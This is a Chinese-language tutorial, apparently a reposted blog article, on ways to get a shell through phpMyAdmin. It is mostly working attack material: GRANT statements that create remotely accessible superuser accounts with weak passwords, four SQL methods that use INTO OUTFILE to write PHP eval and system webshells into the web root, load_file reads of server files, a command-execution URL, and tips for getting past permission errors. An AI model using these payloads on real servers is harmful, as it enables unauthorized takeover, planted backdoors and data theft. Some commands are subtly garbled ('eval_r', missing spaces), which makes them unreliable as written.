这篇文章将为大家详细讲解有关PHPmyadmin拿shell的方法有哪些,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。
PHPmyadmin修改用户密码
直接点击上面的localhost或者1270.0.1,出现用户一栏,点击修改即可
添加超级用户guetsec密码ooxx并且允许外连
GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' IDENTIFIED BY 'ooxx' WITH GRANT OPTION;
我们可以创建root账户设置密码
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;
这样就创建了root外联账户,密码123456,外链时用123456
拿shell四种经典方法:
方法一:
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL ); INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval_r($_POST[7on])?>'); SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php'; ----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php 一句话连接密码:7on
方法二:
读取文件内容: select load_file('E:/xamp/www/s.php'); 写一句话: select '<?php @eval_r($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php' cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
方法三:
JhackJ版本 PHPmyadmin拿shell
Create TABLE study (cmd text NOT NULL); Insert INTO study (cmd) VALUES('<?php eval_r($_POST[cmd])?>'); select cmd from study into outfile 'E:/wamp/www/7.php'; Drop TABLE IF EXISTS study; <?php eval_r($_POST[cmd])?> -------------------------------------------------------------------------------- <?php @eval_r($_POST[cmd])?> CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。 INSERT INTO study( cmd ) VALUES ('<?php eval_r($_POST[cmd])?>');# 影响列数: 1 SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1 DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
方法四:
select load_file('E:/xamp/www/study.php'); select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
Phpmyadmin导出一句话时出现(Errcode: 13 - Permission denied)
是对此目录没有权限,可以试试上级目录,或者下级目录
再不行试试NTS引流
还有就是注意目录\
关于“PHPmyadmin拿shell的方法有哪些”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,使各位可以学到更多知识,如果觉得文章不错,请把它分享出去让更多的人看到。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。